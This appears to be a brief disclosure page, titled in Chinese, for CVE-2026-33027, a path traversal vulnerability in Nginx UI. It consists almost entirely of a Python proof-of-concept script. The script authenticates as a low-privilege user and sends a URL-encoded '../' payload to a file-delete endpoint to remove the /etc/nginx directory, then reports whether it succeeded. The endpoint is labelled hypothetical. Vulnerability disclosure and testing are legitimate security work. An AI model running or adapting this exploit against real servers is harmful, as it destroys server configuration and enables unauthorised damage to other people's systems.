CVE-2026-33027 Nginx UI路径遍历漏洞

import requests # Exploit Concept for CVE-2026-33027 # This PoC demonstrates how an authenticated user can delete the /etc/nginx directory target = "http://vulnerable-host:port" login_url = f"{target}/api/login" delete_url = f"{target}/api/files/delete" # Hypothetical endpoint # 1. Authenticate as a low-privilege user credentials = {"username": "attacker", "password": "password"} session = requests.Session() login_resp = session.post(login_url, json=credentials) if login_resp.status_code == 200: # 2. Craft payload with URL-encoded traversal # Payload: ../../../etc/nginx -> Encoded: ..%2F..%2F..%2Fetc%2Fnginx # The backend decodes this and resolves to /etc/nginx payload = { "path": "..%2F..%2F..%2Fetc%2Fnginx" } # 3. Send delete request response = session.delete(delete_url, json=payload) if response.status_code == 200: print("[+] Success: /etc/nginx directory likely deleted.") else: print(f"[-] Failed: Status code {response.status_code}") else: print("[-] Authentication failed")